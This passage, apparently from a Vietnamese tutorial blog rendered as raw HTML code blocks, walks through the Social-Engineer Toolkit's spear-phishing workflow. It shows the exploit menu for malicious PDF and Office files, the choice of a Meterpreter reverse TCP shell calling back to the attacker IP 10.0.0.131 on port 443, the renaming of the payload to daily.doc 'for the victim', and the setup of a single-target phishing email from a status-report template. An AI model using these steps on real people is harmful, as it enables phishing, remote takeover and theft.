<span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">JBIG2Decode <\/span><span class=\"crayon-e\">Memory <\/span><span class=\"crayon-e\">Corruption <\/span><span class=\"crayon-i\">Exploit<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-12\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">PDF <\/span><span class=\"crayon-e\">Embedded <\/span><span class=\"crayon-e\">EXE <\/span><span class=\"crayon-e\">Social <\/span><span class=\"crayon-i\">Engineering<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-13\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-v\">util<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-14\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Custom <\/span><span class=\"crayon-e\">EXE <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">VBA<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sent <\/span><span class=\"crayon-e\">via <\/span><span class=\"crayon-v\">RAR<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">RAR <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-15\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">U3D <\/span><span class=\"crayon-e\">CLODProgressiveMeshDeclaration <\/span><span class=\"crayon-t\">Array<\/span> <span class=\"crayon-i\">Overrun<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-16\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">PDF <\/span><span class=\"crayon-e\">Embedded <\/span><span class=\"crayon-e\">EXE <\/span><span class=\"crayon-e\">Social <\/span><span class=\"crayon-e\">Engineering<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">NOJS<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-17\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Foxit <\/span><span class=\"crayon-e\">PDF <\/span><span class=\"crayon-e\">Reader <\/span><span class=\"crayon-v\">v4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">1.1<\/span> <span class=\"crayon-e\">Title <\/span><span class=\"crayon-e\">Stack <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-18\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Apple <\/span><span class=\"crayon-e\">QuickTime <\/span><span class=\"crayon-e\">PICT <\/span><span class=\"crayon-e\">PnSize <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-19\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Nuance <\/span><span class=\"crayon-e\">PDF <\/span><span class=\"crayon-e\">Reader <\/span><span class=\"crayon-v\">v6<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">0<\/span> <span class=\"crayon-e\">Launch <\/span><span class=\"crayon-e\">Stack <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-20\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">Reader <\/span><span class=\"crayon-e\">u3D <\/span><span class=\"crayon-e\">Memory <\/span><span class=\"crayon-e\">Corruption <\/span><span class=\"crayon-i\">Vulnerability<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-21\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">MSCOMCTL <\/span><span class=\"crayon-e\">ActiveX <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-e\">Overflow<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ms12<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">027<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-22\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee976590865161229-23\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">payloads<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">5<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-24\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>Ch\u1ecdn ti\u1ebfp <strong>2<\/strong> \u0111\u1ec3 t\u1ea1o <strong>meterpreter reverse_shell<\/strong><\/p>\n<div id=\"crayon-55f29ee976597334974282\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976597334974282-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976597334974282-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976597334974282-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976597334974282-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976597334974282-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976597334974282-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976597334974282-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976597334974282-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976597334974282-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976597334974282-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee976597334974282-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Reverse <\/span><span class=\"crayon-e\">TCP <\/span><span class=\"crayon-e\">Shell\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">Spawn<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">command <\/span><span class=\"crayon-e\">shell <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-e\">send <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-i\">attacker<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Meterpreter <\/span><span class=\"crayon-e\">Reverse_TCP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">Spawn<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">meterpreter <\/span><span class=\"crayon-e\">shell <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-e\">send <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-i\">attacker<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Reverse <\/span><span class=\"crayon-e\">VNC <\/span><span class=\"crayon-e\">DLL\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">Spawn<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">VNC <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-e\">send <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-i\">attacker<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Reverse <\/span><span class=\"crayon-e\">TCP <\/span><span class=\"crayon-e\">Shell<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">X64 <\/span><span class=\"crayon-e\">Command <\/span><span class=\"crayon-v\">Shell<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-e\">Reverse <\/span><span class=\"crayon-e\">TCP <\/span><span class=\"crayon-i\">Inline<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Meterpreter <\/span><span class=\"crayon-e\">Reverse_TCP<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-e\">Connect <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">attacker<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-v\">x64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-i\">Meterpreter<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Shell <\/span><span class=\"crayon-e\">Bind_TCP<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">Execute <\/span><span class=\"crayon-e\">payload <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-e\">create <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">accepting <\/span><span class=\"crayon-e\">port <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-i\">system<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-7\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Meterpreter <\/span><span class=\"crayon-e\">Reverse <\/span><span class=\"crayon-e\">HTTPS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-e\">Tunnel <\/span><span class=\"crayon-e\">communication <\/span><span class=\"crayon-e\">over <\/span><span class=\"crayon-e\">HTTP <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">SSL <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-st\">use<\/span> <span class=\"crayon-e\">Meterpreter<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-8\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee976597334974282-9\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">payloads<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div id=\"crayon-55f29ee976597334974282-10\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>G\u00f5 ti\u1ebfp \u0111\u1ecba ch\u1ec9 <strong>IP Attacker<\/strong> , port<strong> listener<\/strong><\/p>\n<div id=\"crayon-55f29ee97659e524731129\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97659e524731129-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97659e524731129-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97659e524731129-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee97659e524731129-1\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">IP <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">for<\/span> <span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">payload <\/span><span class=\"crayon-v\">listener<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-cn\">10.0.0.131<\/span><\/div>\n<div id=\"crayon-55f29ee97659e524731129-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">payloads<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">Port <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">connect <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-i\">on<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">443<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">443<\/span><\/div>\n<div id=\"crayon-55f29ee97659e524731129-3\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 5:<\/strong> ch\u1ecdn <strong>2<\/strong> \u0111\u1ed5i t\u00ean files . \u1ede \u0111\u00e2y t\u00f4i s\u1ebd \u0111\u1ed5i t\u00ean files g\u1eedi cho n\u1ea1n nh\u00e2n l\u00e0 daily.doc<\/p>\n<div id=\"crayon-55f29ee9765a4462904901\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a4462904901-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a4462904901-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a4462904901-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a4462904901-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a4462904901-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a4462904901-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a4462904901-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a4462904901-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a4462904901-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a4462904901-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765a4462904901-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-st\">Do<\/span> <span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">want <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">rename <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-2\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-e\">example <\/span><span class=\"crayon-e\">Enter <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-r\">new<\/span> <span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-v\">moo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">pdf<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-4\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-cn\">1.<\/span> <span class=\"crayon-e\">Keep <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-i\">I<\/span> <span class=\"crayon-i\">don<\/span>&#8216;<span class=\"crayon-i\">t<\/span> <span class=\"crayon-v\">care<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-cn\">2.<\/span> <span class=\"crayon-e\">Rename <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-i\">I<\/span> <span class=\"crayon-e\">want <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">cool<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-7\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">2<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-9\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-r\">New<\/span> <span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">daily<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">doc<\/span><\/div>\n<div id=\"crayon-55f29ee9765a4462904901-10\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 6:<\/strong> trong b\u01b0\u1edbc n\u00e0y \u0111\u1ec3 t\u1ea5n c\u00f4ng h\u00e0ng lo\u1ea1t email ch\u1ecdn<strong> 2<\/strong>. Nh\u01b0ng t\u00f4i ch\u1ec9 demo <strong>1<\/strong>email n\u00ean ch\u1ecdn<strong> 1<\/strong>.<\/p>\n<div id=\"crayon-55f29ee9765a9026121032\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a9026121032-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a9026121032-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a9026121032-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a9026121032-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a9026121032-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a9026121032-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a9026121032-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765a9026121032-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765a9026121032-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765a9026121032-1\" class=\"crayon-line\"><span class=\"crayon-e\">What <\/span><span class=\"crayon-st\">do<\/span> <span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">want <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-st\">do<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-2\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1.<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">E<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Mail <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-e\">Single <\/span><span class=\"crayon-e\">Email <\/span><span class=\"crayon-i\">Address<\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2.<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">E<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Mail <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-e\">Mass <\/span><span class=\"crayon-i\">Mailer<\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-5\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">99.<\/span> <span class=\"crayon-st\">Return<\/span> <span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">main <\/span><span class=\"crayon-v\">menu<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-7\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div id=\"crayon-55f29ee9765a9026121032-9\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 7:<\/strong> g\u00f5 <strong>1<\/strong> ch\u1ecdn m\u1eabu template \u0111\u00e3 c\u00f3 s\u1eb5n. T\u00f4i ch\u1ecdn m\u1eabu status reports<\/p>\n<div id=\"crayon-55f29ee9765af093471807\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765af093471807-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765af093471807-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765af093471807-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765af093471807-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765af093471807-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765af093471807-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765af093471807-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765af093471807-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765af093471807-1\" class=\"crayon-line\"><span class=\"crayon-st\">Do<\/span> <span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">want <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-st\">use<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">predefined <\/span><span class=\"crayon-e\">template <\/span><span class=\"crayon-st\">or<\/span> <span class=\"crayon-i\">craft<\/span><\/div>\n<div id=\"crayon-55f29ee9765af093471807-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">one <\/span><span class=\"crayon-e\">time <\/span><span class=\"crayon-e\">email <\/span><span class=\"crayon-v\">template<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765af093471807-3\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765af093471807-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1.<\/span> <span class=\"crayon-v\">Pre<\/span><span 